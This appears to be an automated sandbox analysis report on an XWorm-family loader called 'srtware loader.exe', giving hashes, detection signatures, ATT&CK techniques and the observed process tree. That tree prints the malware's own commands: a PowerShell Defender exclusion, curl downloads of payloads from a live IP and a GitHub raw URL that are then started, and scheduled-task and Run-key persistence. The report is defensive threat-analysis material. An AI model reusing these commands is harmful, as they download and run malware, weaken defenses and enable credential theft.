Resubmissions
17-11-2024 12:44
241117-pyzmeazjez 10Analysis
-
max time kernel
62s -
max time network
69s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 12:44
Static task
static1
Behavioral task
behavioral1
Sample
srtware loader.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
srtware loader.exe
Resource
win10v2004-20241007-en
General
-
Target
srtware loader.exe
-
Size
1.1MB
-
MD5
de920407355f76c7ef087fafb1f8ae8c
-
SHA1
73ec5917b60133981764f57939c576a5ea94c2d5
-
SHA256
eedee87650ce6252c755af15d7065ca4292fc56dd5e848335dc8265ded837fc1
-
SHA512
4278b11aab909a92157f0a3221ae775c12088e6464f7a8f63ac58c3d4df29327565a97147d3a0d9a9647f83783dba6db7935c22a70c393e4e603e2dda44d9112
-
SSDEEP
24576:WLzpI+xRUz1EGES2zRP9RPVwzCBjzZg/amV8q2MBTZr5VlenU:6dxKNePXVKVLn1Vj
Malware Config
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral2/memory/916-67-0x0000000000930000-0x0000000000CE2000-memory.dmp family_xworm behavioral2/memory/916-68-0x0000000000930000-0x0000000000CE2000-memory.dmp family_xworm behavioral2/memory/1420-82-0x0000000000F10000-0x00000000012C2000-memory.dmp family_xworm behavioral2/memory/1420-85-0x0000000000F10000-0x00000000012C2000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1500 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 8 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/3484-2-0x0000000000E80000-0x00000000011FC000-memory.dmp net_reactor behavioral2/files/0x0007000000023ccb-59.dat net_reactor behavioral2/memory/3480-61-0x0000019480C60000-0x0000019480CB8000-memory.dmp net_reactor behavioral2/memory/916-67-0x0000000000930000-0x0000000000CE2000-memory.dmp net_reactor behavioral2/memory/916-68-0x0000000000930000-0x0000000000CE2000-memory.dmp net_reactor behavioral2/memory/1420-82-0x0000000000F10000-0x00000000012C2000-memory.dmp net_reactor behavioral2/memory/1420-85-0x0000000000F10000-0x00000000012C2000-memory.dmp net_reactor behavioral2/memory/3484-94-0x0000000000E80000-0x00000000011FC000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation qqq.scr -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msnotify.lnk qqq.scr File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msnotify.lnk qqq.scr -
Executes dropped EXE 4 IoCs
pid Process 3480 fff.scr 916 qqq.scr 1420 msnotify.exe 1476 srtware.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msnotify = "C:\\Users\\Admin\\AppData\\Roaming\\msnotify.exe" qqq.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 raw.githubusercontent.com 28 raw.githubusercontent.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 3484 srtware loader.exe 3484 srtware loader.exe 3484 srtware loader.exe 916 qqq.scr 916 qqq.scr 3484 srtware loader.exe 1420 msnotify.exe 916 qqq.scr 3484 srtware loader.exe 916 qqq.scr 916 qqq.scr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language srtware loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msnotify.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qqq.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4832 cmd.exe 3800 PING.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 644 ipconfig.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3800 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2184 schtasks.exe 1284 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1500 powershell.exe 1500 powershell.exe 3480 fff.scr 3480 fff.scr 1476 srtware.exe 1476 srtware.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1476 srtware.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 3480 fff.scr Token: SeDebugPrivilege 916 qqq.scr Token: SeDebugPrivilege 1420 msnotify.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3484 srtware loader.exe 916 qqq.scr 1420 msnotify.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3484 wrote to memory of 1500 3484 srtware loader.exe 94 PID 3484 wrote to memory of 1500 3484 srtware loader.exe 94 PID 3484 wrote to memory of 1500 3484 srtware loader.exe 94 PID 3484 wrote to memory of 2904 3484 srtware loader.exe 102 PID 3484 wrote to memory of 2904 3484 srtware loader.exe 102 PID 3484 wrote to memory of 2904 3484 srtware loader.exe 102 PID 2904 wrote to memory of 5076 2904 cmd.exe 104 PID 2904 wrote to memory of 5076 2904 cmd.exe 104 PID 2904 wrote to memory of 5076 2904 cmd.exe 104 PID 3484 wrote to memory of 3968 3484 srtware loader.exe 105 PID 3484 wrote to memory of 3968 3484 srtware loader.exe 105 PID 3484 wrote to memory of 3968 3484 srtware loader.exe 105 PID 3968 wrote to memory of 408 3968 cmd.exe 107 PID 3968 wrote to memory of 408 3968 cmd.exe 107 PID 3968 wrote to memory of 408 3968 cmd.exe 107 PID 3484 wrote to memory of 3128 3484 srtware loader.exe 108 PID 3484 wrote to memory of 3128 3484 srtware loader.exe 108 PID 3484 wrote to memory of 3128 3484 srtware loader.exe 108 PID 3128 wrote to memory of 5048 3128 cmd.exe 110 PID 3128 wrote to memory of 5048 3128 cmd.exe 110 PID 3128 wrote to memory of 5048 3128 cmd.exe 110 PID 3484 wrote to memory of 4368 3484 srtware loader.exe 111 PID 3484 wrote to memory of 4368 3484 srtware loader.exe 111 PID 3484 wrote to memory of 4368 3484 srtware loader.exe 111 PID 4368 wrote to memory of 2148 4368 cmd.exe 113 PID 4368 wrote to memory of 2148 4368 cmd.exe 113 PID 4368 wrote to memory of 2148 4368 cmd.exe 113 PID 3484 wrote to memory of 2472 3484 srtware loader.exe 116 PID 3484 wrote to memory of 2472 3484 srtware loader.exe 116 PID 3484 wrote to memory of 2472 3484 srtware loader.exe 116 PID 2472 wrote to memory of 3480 2472 cmd.exe 118 PID 2472 wrote to memory of 3480 2472 cmd.exe 118 PID 3484 wrote to memory of 4972 3484 srtware loader.exe 120 PID 3484 wrote to memory of 4972 3484 srtware loader.exe 120 PID 3484 wrote to memory of 4972 3484 srtware loader.exe 120 PID 4972 wrote to memory of 916 4972 cmd.exe 122 PID 4972 wrote to memory of 916 4972 cmd.exe 122 PID 4972 wrote to memory of 916 4972 cmd.exe 122 PID 3484 wrote to memory of 2844 3484 srtware loader.exe 123 PID 3484 wrote to memory of 2844 3484 srtware loader.exe 123 PID 3484 wrote to memory of 2844 3484 srtware loader.exe 123 PID 2844 wrote to memory of 2184 2844 cmd.exe 125 PID 2844 wrote to memory of 2184 2844 cmd.exe 125 PID 2844 wrote to memory of 2184 2844 cmd.exe 125 PID 916 wrote to memory of 1284 916 qqq.scr 126 PID 916 wrote to memory of 1284 916 qqq.scr 126 PID 916 wrote to memory of 1284 916 qqq.scr 126 PID 3484 wrote to memory of 1656 3484 srtware loader.exe 131 PID 3484 wrote to memory of 1656 3484 srtware loader.exe 131 PID 3484 wrote to memory of 1656 3484 srtware loader.exe 131 PID 1656 wrote to memory of 644 1656 cmd.exe 133 PID 1656 wrote to memory of 644 1656 cmd.exe 133 PID 1656 wrote to memory of 644 1656 cmd.exe 133 PID 3484 wrote to memory of 4184 3484 srtware loader.exe 136 PID 3484 wrote to memory of 4184 3484 srtware loader.exe 136 PID 3484 wrote to memory of 4184 3484 srtware loader.exe 136 PID 4184 wrote to memory of 2484 4184 cmd.exe 138 PID 4184 wrote to memory of 2484 4184 cmd.exe 138 PID 4184 wrote to memory of 2484 4184 cmd.exe 138 PID 3484 wrote to memory of 4832 3484 srtware loader.exe 139 PID 3484 wrote to memory of 4832 3484 srtware loader.exe 139 PID 3484 wrote to memory of 4832 3484 srtware loader.exe 139 PID 4832 wrote to memory of 3800 4832 cmd.exe 141 PID 4832 wrote to memory of 3800 4832 cmd.exe 141
Processes
-
C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/abc -o %localappdata%/Temp/fff.scr2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\curl.execurl http://79.110.49.246/didedba/abc -o C:\Users\Admin\AppData\Local/Temp/fff.scr3⤵PID:5076
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/adderall -o %localappdata%/Temp/qqq.scr2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\curl.execurl http://79.110.49.246/didedba/adderall -o C:\Users\Admin\AppData\Local/Temp/qqq.scr3⤵PID:408
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/write -o %localappdata%/Temp/ddd.scr2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\SysWOW64\curl.execurl http://79.110.49.246/didedba/write -o C:\Users\Admin\AppData\Local/Temp/ddd.scr3⤵PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o %localappdata%/Temp/srtware.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\curl.execurl https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\Admin\AppData\Local/Temp/srtware.exe3⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/fff.scr2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\fff.scrC:\Users\Admin\AppData\Local/Temp/fff.scr3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/qqq.scr2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\qqq.scrC:\Users\Admin\AppData\Local/Temp/qqq.scr3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msnotify" /tr "C:\Users\Admin\AppData\Roaming\msnotify.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1284
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c schtasks /create /tn "chromeupdatecc" /tr "%localappdata%\Temp\qqq.scr" /sc onstart /rl highest /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "chromeupdatecc" /tr "C:\Users\Admin\AppData\Local\Temp\qqq.scr" /sc onstart /rl highest /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2184
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ipconfig /flushdns2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:644
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c netsh winsock reset2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\SysWOW64\netsh.exenetsh winsock reset3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping google.com2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\PING.EXEping google.com3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/srtware.exe2⤵
- System Location Discovery: System Language Discovery
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\srtware.exeC:\Users\Admin\AppData\Local/Temp/srtware.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1476
-
-
-
C:\Users\Admin\AppData\Roaming\msnotify.exeC:\Users\Admin\AppData\Roaming\msnotify.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1420
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
323KB
MD574d6f32778a0b992a234c289177919cf
SHA157bd620963c82d6263c6b4cb4fe2e6142c7e219e
SHA25669ebffe0e5a41ad4aca8de361d619a521feb1987c8139ff2d14e3c5ee8538371
SHA5126652450ef46db88295152ffc1cccf50b09f1d87d94e75392a591120f3d0eb81d8cc51975e96b85ba927e1283545557fd2bc0196899cadd1293f280996ac6c10d
-
Filesize
1.1MB
MD536020c619abd90ea304426a74fbed6a9
SHA1ea24acdb139fe6c17e2228faa1c2ed98650c5875
SHA2565bc4cf7de8eb8c24597b7a3d9001827010923390c9fe49adee46bfd01ad639d5
SHA5125ffb1d5021399091349c2e5b71a919d225bdc2bc59be18dbdfef0c7b3bc11ee8a93d9c57a0da49851cf1eebc6c77d09c4f4f82e4ffca004ad544f0d67eeca9a8
-
Filesize
407KB
MD5e364a1bd0e0be70100779ff5389a78da
SHA1dd8269db6032720dbac028931e28a6588fca7bae
SHA2567c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338